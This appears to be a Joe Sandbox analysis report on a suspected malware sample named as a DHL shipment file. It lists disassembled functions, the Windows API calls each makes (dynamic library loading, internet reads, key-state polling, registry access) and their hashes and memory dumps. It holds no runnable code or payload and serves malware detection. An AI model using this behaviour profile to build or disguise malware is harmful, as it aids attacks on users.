Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 00e82417df033884b7a07016b8540bf27292ecc93899a267025ea981937ec617
Instruction ID: b85515594564b92e6c31b95e9f462c10ac5431d5573795d04b3180bb48736bbe
Opcode Fuzzy Hash: 00e82417df033884b7a07016b8540bf27292ecc93899a267025ea981937ec617
Instruction Fuzzy Hash: 8061C135218241BFC715DF54D490E2ABBE5FF85308F54895CF4998B2A2CB31ED45CB92

Function 00208BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00208BCD
VariantClear.OLEAUT32 ref: 00208C3E
VariantClear.OLEAUT32 ref: 00208C9D
VariantClear.OLEAUT32(?), ref: 00208D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00208D3B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 80a3c758ca95b5bb180220e574723ce30d143d37f925fbb54234675a2cf8df70
Instruction ID: f4bcf4e14f8bccb2ebbffbd410d28503a3840bcceca1bf7122c0dc73573bca40
Opcode Fuzzy Hash: 80a3c758ca95b5bb180220e574723ce30d143d37f925fbb54234675a2cf8df70
Instruction Fuzzy Hash: A6516AB5A10219EFDB14CF68D884AAAB7F8FF89310B158569E945DB350E730E921CF90

Function 00218AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00218BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00218BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00218C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00218C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00218C5F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 7cd58bb83dfd7e669562338e795101014495e78a60973b7cce0bcdd473da3ef2
Instruction ID: 057aab9410cd998c8010f668f5a154baa8dfe565550e57ef4ea1d94d66fead94
Opcode Fuzzy Hash: 7cd58bb83dfd7e669562338e795101014495e78a60973b7cce0bcdd473da3ef2
Instruction Fuzzy Hash: 47515A39A00215DFCB05DF64C881AAEBBF5FF59314F088059E849AB3A2CB31ED51CB90

Function 00228EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00228F40
GetProcAddress.KERNEL32(00000000,?), ref: 00228FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00228FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00229032
FreeLibrary.KERNEL32(00000000), ref: 00229052

Part of subcall function 001BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00211043,?,7735E610), ref: 001BF6E6
Part of subcall function 001BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,001FFA64,00000000,00000000,?,?,00211043,?,7735E610,?,001FFA64), ref: 001BF70D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 76c15a7479de7d2f6213b5ebd8ad91adc6950b8eb9983c54ea490852c3154567
Instruction ID: 0320dc452213ca5eff054a3a2a60d8b3ad7377df670dd78f4a8663342e96e223
Opcode Fuzzy Hash: 76c15a7479de7d2f6213b5ebd8ad91adc6950b8eb9983c54ea490852c3154567
Instruction Fuzzy Hash: 04518E38A05215EFC701DF94D4948ADBBF1FF59314F588098E809AB762DB31EE85CB90

Function 00236B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00236C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00236C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00236C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0021AB79,00000000,00000000), ref: 00236C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00236CC7

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: b4914faaed94966b2513a81143e6e073ac576e738d50627a4eea5fb961e69474
Instruction ID: a6f1f71f1af0a96827e0900fbc90185847dc2f01932c2b48b09b771528a0a8db
Opcode Fuzzy Hash: b4914faaed94966b2513a81143e6e073ac576e738d50627a4eea5fb961e69474
Instruction Fuzzy Hash: 19410AB5620105BFDB24CF28CC5DFA9BBADEB09350F149625F855A72E0C371ED61CA50

Function 001D2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001D20C3
_free.LIBCMT ref: 001D20E3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2f4b9782920c3b29c482850540d5a061ed05fdcb2ac29f1190665a254ffb4a67
Instruction ID: fd607fca82cc57c255278bea8f97b200a970c39e799da584398b14040bf83654
Opcode Fuzzy Hash: 2f4b9782920c3b29c482850540d5a061ed05fdcb2ac29f1190665a254ffb4a67
Instruction Fuzzy Hash: 9541D732A00200AFCB24DF78C881A6DB7F5EFA9314F1585AAE525EB351D731ED01DB80

Function 001B912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001B9141
ScreenToClient.USER32(00000000,?), ref: 001B915E
GetAsyncKeyState.USER32(00000001), ref: 001B9183
GetAsyncKeyState.USER32(00000002), ref: 001B919D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: eca2f111e2eaf0a562552f9226068d6e86647af14f7f37fd70144d4d5e7d0ac7
Instruction ID: 38a77112b5512a55103b56cd633854da76274e484d71f5c8e5787d6d8dc32bc9
Opcode Fuzzy Hash: eca2f111e2eaf0a562552f9226068d6e86647af14f7f37fd70144d4d5e7d0ac7
Instruction Fuzzy Hash: 6B415C71A0860AFBDF199F68C848BFEB774FF05320F21821AE529A62D0C7346955DF91

Function 00213874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002138CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00213922
TranslateMessage.USER32(?), ref: 0021394B
DispatchMessageW.USER32(?), ref: 00213955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00213966

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 677225ce0522ab4c958d38fb9a3281f47e1666fb920baf6939fe5b112aa55018
Instruction ID: 9757f6d2e990ea62893840028df08ee4947d43ae5d4209eb78975cf97b9c8ace
Opcode Fuzzy Hash: 677225ce0522ab4c958d38fb9a3281f47e1666fb920baf6939fe5b112aa55018
Instruction Fuzzy Hash: E231C470924346DEEB35CF34A84DBF63BE9AF25300F140569E466921A0E3F4AAE5CB51

Function 0021CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0021C21E,00000000), ref: 0021CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0021CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0021C21E,00000000), ref: 0021CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0021C21E,00000000), ref: 0021CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0021C21E,00000000), ref: 0021CFF2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 02274c65879af762d4992ae52fa19d5a21b56e64131b862681d0ee1df01dfeff
Instruction ID: 5e85f0f4ec35d812dc63aa1d354c0f003e65a05c1936e100f817179066a1ef87
Opcode Fuzzy Hash: 02274c65879af762d4992ae52fa19d5a21b56e64131b862681d0ee1df01dfeff
Instruction Fuzzy Hash: 7E318075550206EFDB20DFA5D888AEBBBF9EB24310B20442FF516E2550D730ED92DB60

Function 00201901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00201915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002019C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002019C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002019DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002019E2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 1796172c52ea422dae11f339635670b2ff1039b9c99f7cd717f468f0d22e9f5c
Instruction ID: 655714171dd787722a2ce9f495daaf4834c4d36187dce7295ed215eef8f599cd
Opcode Fuzzy Hash: 1796172c52ea422dae11f339635670b2ff1039b9c99f7cd717f468f0d22e9f5c
Instruction Fuzzy Hash: E831E071A1021EEFCB04CFA8DD9DADE3BB5EB44314F104229F921A72D2C3B09964CB90

Function 00235706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00235745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0023579D
_wcslen.LIBCMT ref: 002357AF
_wcslen.LIBCMT ref: 002357BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00235816

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: ac9e86d018798dd31c1b258c501ebf8b4386e38207aa7d8dea686a1eb680dcb1
Instruction ID: 193f765b59526d707344e5dda6520abbc99fad7457fe233216717cb6a4050ed2
Opcode Fuzzy Hash: ac9e86d018798dd31c1b258c501ebf8b4386e38207aa7d8dea686a1eb680dcb1
Instruction Fuzzy Hash: 2421A5B19246299BDB208F64DC85AEDB7B8FF54324F108216F91DEA180D7708995CF50

Function 00220930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00220951
GetForegroundWindow.USER32 ref: 00220968
GetDC.USER32(00000000), ref: 002209A4
GetPixel.GDI32(00000000,?,00000003), ref: 002209B0
ReleaseDC.USER32(00000000,00000003), ref: 002209E8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5d1428f0a53138da5b5075d7b5e5c900988ce24b74a9d3c98b024d8c6a15d12d
Instruction ID: e5753093466cd96fca9c76d985469072f7bbd05471e5357e85d05a9beff42d7f
Opcode Fuzzy Hash: 5d1428f0a53138da5b5075d7b5e5c900988ce24b74a9d3c98b024d8c6a15d12d
Instruction Fuzzy Hash: B6218435A00214AFD714EFA5D889A9EB7F9EF55700F148068E84AA7762CB70EC54CF50

Function 001DCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001DCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001DCDE9

Part of subcall function 001D3820: RtlAllocateHeap.NTDLL(00000000,?,00271444,?,001BFDF5,?,?,001AA976,00000010,00271440,001A13FC,?,001A13C6,?,001A1129), ref: 001D3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001DCE0F
_free.LIBCMT ref: 001DCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001DCE31

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0be0cfe37f8b22760710d3b0b7b44a21621739d01e434f0c58e04ebdb60de689
Instruction ID: 61ba7c9b729af3b5117948e3850b1574a109df404e0cc415c6aa7b8d0ec71e7c
Opcode Fuzzy Hash: 0be0cfe37f8b22760710d3b0b7b44a21621739d01e434f0c58e04ebdb60de689
Instruction Fuzzy Hash: 600184B26016167F672116BA6C8CD7BBE6EDEC6BA1325062BF905D7301EB618D01D2F0

Function 001B9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001B9693
SelectObject.GDI32(?,00000000), ref: 001B96A2
BeginPath.GDI32(?), ref: 001B96B9
SelectObject.GDI32(?,00000000), ref: 001B96E2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b066466bba3630b32dfe1fdf5277a8a7032d40636c470d05f17d6c524c1d1f6d
Instruction ID: b968e937447d6b359189fa1bb06748dc0673b91325b454cdcb50a4a011568078
Opcode Fuzzy Hash: b066466bba3630b32dfe1fdf5277a8a7032d40636c470d05f17d6c524c1d1f6d
Instruction Fuzzy Hash: FE216A71802246EBDB119F28FC1DBE97BA8BF10325F200216F618A61A0D37098A3CF90

Function 00205711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00205726
_memcmp.LIBVCRUNTIME ref: 00205744
_memcmp.LIBVCRUNTIME ref: 00205757
_memcmp.LIBVCRUNTIME ref: 0020576F
_memcmp.LIBVCRUNTIME ref: 00205787

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 1953a0aa27470cf6eba7d1b540385bc430d9840e90dbb19813d385a35e94c553
Instruction ID: 4d24627fee12163f22491f03a95ad6ed4095490ce11cfc734a12da24b53cbdf5
Opcode Fuzzy Hash: 1953a0aa27470cf6eba7d1b540385bc430d9840e90dbb19813d385a35e94c553
Instruction Fuzzy Hash: 8801F9A16E1755BBD70895109F82FBBB35DAF323A8F000025FD049A2C3F760ED3096A1

Function 001D2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001CF2DE,001D3863,00271444,?,001BFDF5,?,?,001AA976,00000010,00271440,001A13FC,?,001A13C6), ref: 001D2DFD
_free.LIBCMT ref: 001D2E32
_free.LIBCMT ref: 001D2E59
SetLastError.KERNEL32(00000000,001A1129), ref: 001D2E66
SetLastError.KERNEL32(00000000,001A1129), ref: 001D2E6F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9c98e46be4fadb9821f6186570d5375bda1f94be9ba6f750e800daa8bee4ea53
Instruction ID: 2a7d7048c7a45d24607a4b141628a43c7e5217e019164fb3639884db7302dc81
Opcode Fuzzy Hash: 9c98e46be4fadb9821f6186570d5375bda1f94be9ba6f750e800daa8bee4ea53
Instruction Fuzzy Hash: AC0128326056006BC62677347C49D2B275EABF23B6B35442BF435A33D2EFB0CC019120

Function 0020000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?,?,0020035E), ref: 0020002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?), ref: 00200046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?), ref: 00200054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?), ref: 00200064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001FFF41,80070057,?,?), ref: 00200070

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 0d1b65a42a2be4f3401555376eabe38134db486d700dbb899e788db84130fde9
Instruction ID: 7e0513212cbc1d1ab24101fddde065acf1fc5bd162cc18bd5b7c62a3555d9fc5
Opcode Fuzzy Hash: 0d1b65a42a2be4f3401555376eabe38134db486d700dbb899e788db84130fde9
Instruction Fuzzy Hash: 3301A276610315BFEB114F68EC88BAA7AEEEF44751F244124F905E2251DB71DE508BA0

Function 0020E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0020E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0020E9A5
Sleep.KERNEL32(00000000), ref: 0020E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0020E9B7
Sleep.KERNEL32 ref: 0020E9F3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

